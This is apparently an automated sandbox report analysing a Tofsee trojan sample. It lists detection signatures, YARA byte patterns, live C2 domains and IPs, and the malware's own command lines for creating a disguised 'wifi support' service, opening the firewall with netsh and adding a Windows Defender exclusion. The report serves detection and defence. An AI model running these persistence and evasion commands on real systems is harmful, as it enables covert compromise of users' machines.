Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
874A7cigvX.exe

Overview

General Information

Sample name:874A7cigvX.exe
renamed because original name is a hash value
Original sample name:Trojan.Autorun.ATA_virussign.com_f7ae445081e10267d2cec9b6b0e2d375.exe
Analysis ID:1506014
MD5:f7ae445081e10267d2cec9b6b0e2d375
SHA1:e12892ea4d092e4b959617c6d00356ee23da0797
SHA256:569edae4e4c7f5df590c7ee0a96210942e2be22be73beda9bc1528addca234f4
Infos:

Detection

Tofsee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Tofsee
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious New Service Creation
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Windows Defender Exclusions Added - Registry
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 874A7cigvX.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\874A7cigvX.exe" MD5: F7AE445081E10267D2CEC9B6B0E2D375)
    • cmd.exe (PID: 3472 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ycgeofkw\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3712 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\xvkslbws.exe" C:\Windows\SysWOW64\ycgeofkw\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6552 cmdline: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6728 cmdline: "C:\Windows\System32\sc.exe" description ycgeofkw "wifi internet conection" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 984 cmdline: "C:\Windows\System32\sc.exe" start ycgeofkw MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • netsh.exe (PID: 4508 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • xvkslbws.exe (PID: 1440 cmdline: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe" MD5: 702317DA74C3C1D30ED61EA3A7D7DFCD)
    • svchost.exe (PID: 6204 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
TofseeAccording to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.Cyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee
{"C2 list": ["vanaheim.cn:443", "jotunheim.name:443"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
    00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Tofsee_26124fe4unknownunknown
    • 0x27ab:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
    • 0xf0fc:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
    0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
      0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmpWindows_Trojan_Tofsee_26124fe4unknownunknown
      • 0x2544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
      • 0xee95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
      Click to see the 24 entries
      SourceRuleDescriptionAuthorStrings
      0.2.874A7cigvX.exe.2610e67.1.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
      • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
      • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
      0.2.874A7cigvX.exe.2610e67.1.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
      • 0xe110:$s2: loader_id
      • 0xe140:$s3: start_srv
      • 0xe170:$s4: lid_file_upd
      • 0xe164:$s5: localcfg
      • 0xe894:$s6: Incorrect respons
      12.2.xvkslbws.exe.2d70e67.1.unpackWindows_Trojan_Tofsee_26124fe4unknownunknown
      • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
      • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
      12.2.xvkslbws.exe.2d70e67.1.unpackMALWARE_Win_TofseeDetects TofseeditekSHen
      • 0xe110:$s2: loader_id
      • 0xe140:$s3: start_srv
      • 0xe170:$s4: lid_file_upd
      • 0xe164:$s5: localcfg
      • 0xe894:$s6: Incorrect respons
      0.2.874A7cigvX.exe.400000.0.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
        Click to see the 39 entries

        System Summary

        barindex
        Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe, ParentProcessId: 1440, ParentProcessName: xvkslbws.exe, ProcessCommandLine: svchost.exe, ProcessId: 6204, ProcessName: svchost.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Users\user\Desktop\874A7cigvX.exe, ParentProcessId: 2796, ParentProcessName: 874A7cigvX.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", ProcessId: 6552, ProcessName: sc.exe
        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 52.101.42.0, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 6204, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d"C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe, ParentProcessId: 1440, ParentProcessName: xvkslbws.exe, ProcessCommandLine: svchost.exe, ProcessId: 6204, ProcessName: svchost.exe
        Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6204, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\SysWOW64\ycgeofkw
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\874A7cigvX.exe", ParentImage: C:\Users\user\Desktop\874A7cigvX.exe, ParentProcessId: 2796, ParentProcessName: 874A7cigvX.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create ycgeofkw binPath= "C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe /d\"C:\Users\user\Desktop\874A7cigvX.exe\"" type= own start= auto DisplayName= "wifi support", ProcessId: 6552, ProcessName: sc.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: vanaheim.cn:443Avira URL Cloud: Label: phishing
        Source: jotunheim.name:443Avira URL Cloud: Label: malware
        Source: 12.2.xvkslbws.exe.400000.0.unpackMalware Configuration Extractor: Tofsee {"C2 list": ["vanaheim.cn:443", "jotunheim.name:443"]}
        Source: vanaheim.cnVirustotal: Detection: 15%Perma Link
        Source: vanaheim.cn:443Virustotal: Detection: 7%Perma Link
        Source: jotunheim.name:443Virustotal: Detection: 12%Perma Link
        Source: 874A7cigvX.exeVirustotal: Detection: 67%Perma Link
        Source: 874A7cigvX.exeReversingLabs: Detection: 68%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\AppData\Local\Temp\xvkslbws.exeJoe Sandbox ML: detected
        Source: 874A7cigvX.exeJoe Sandbox ML: detected

        Compliance

        barindex
        Source: C:\Users\user\Desktop\874A7cigvX.exeUnpacked PE file: 0.2.874A7cigvX.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exeUnpacked PE file: 12.2.xvkslbws.exe.400000.0.unpack
        Source: 874A7cigvX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\874A7cigvX.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Change of critical system settings

        barindex
        Source: C:\Windows\SysWOW64\svchost.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\ycgeofkwJump to behavior

        Networking

        barindex
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.232.41.29 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.101.42.0 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.233.166.26 25Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.204.74 25Jump to behavior
        Source: Malware configuration extractorURLs: vanaheim.cn:443
        Source: Malware configuration extractorURLs: jotunheim.name:443
        Source: Joe Sandbox ViewIP Address: 52.101.42.0 52.101.42.0
        Source: Joe Sandbox ViewIP Address: 217.69.139.150 217.69.139.150
        Source: Joe Sandbox ViewIP Address: 77.232.41.29 77.232.41.29
        Source: Joe Sandbox ViewIP Address: 67.195.204.74 67.195.204.74
        Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
        Source: Joe Sandbox ViewASN Name: MAILRU-ASMailRuRU MAILRU-ASMailRuRU
        Source: Joe Sandbox ViewASN Name: EUT-ASEUTIPNetworkRU EUT-ASEUTIPNetworkRU
        Source: Joe Sandbox ViewASN Name: YAHOO-3US YAHOO-3US
        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 52.101.42.0:25
        Source: global trafficTCP traffic: 192.168.2.5:49712 -> 67.195.204.74:25
        Source: global trafficTCP traffic: 192.168.2.5:49713 -> 64.233.166.26:25
        Source: global trafficTCP traffic: 192.168.2.5:49716 -> 217.69.139.150:25
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,0_2_00402A62
        Source: global trafficDNS traffic detected: DNS query: microsoft-com.mail.protection.outlook.com
        Source: global trafficDNS traffic detected: DNS query: vanaheim.cn
        Source: global trafficDNS traffic detected: DNS query: yahoo.com
        Source: global trafficDNS traffic detected: DNS query: mta7.am0.yahoodns.net
        Source: global trafficDNS traffic detected: DNS query: google.com
        Source: global trafficDNS traffic detected: DNS query: smtp.google.com
        Source: global trafficDNS traffic detected: DNS query: mail.ru
        Source: global trafficDNS traffic detected: DNS query: mxs.mail.ru
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 874A7cigvX.exe PID: 2796, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xvkslbws.exe PID: 1440, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6204, type: MEMORYSTR

        System Summary

        barindex
        Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.874A7cigvX.exe.2610e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.2d70e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.874A7cigvX.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.3.874A7cigvX.exe.2630000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 15.2.svchost.exe.30f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.2d70e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.3.874A7cigvX.exe.2630000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.874A7cigvX.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0.2.874A7cigvX.exe.2610e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.2df0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.3.xvkslbws.exe.2d90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 15.2.svchost.exe.30f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.2.xvkslbws.exe.2df0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 12.3.xvkslbws.exe.2d90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
        Source: 00000000.00000003.2046211067.0000000002630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Tofsee Author: ditekSHen
        Source: C:\Users\user\Desktop\874A7cigvX.exeCode function: 0_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,0_2_00408E26
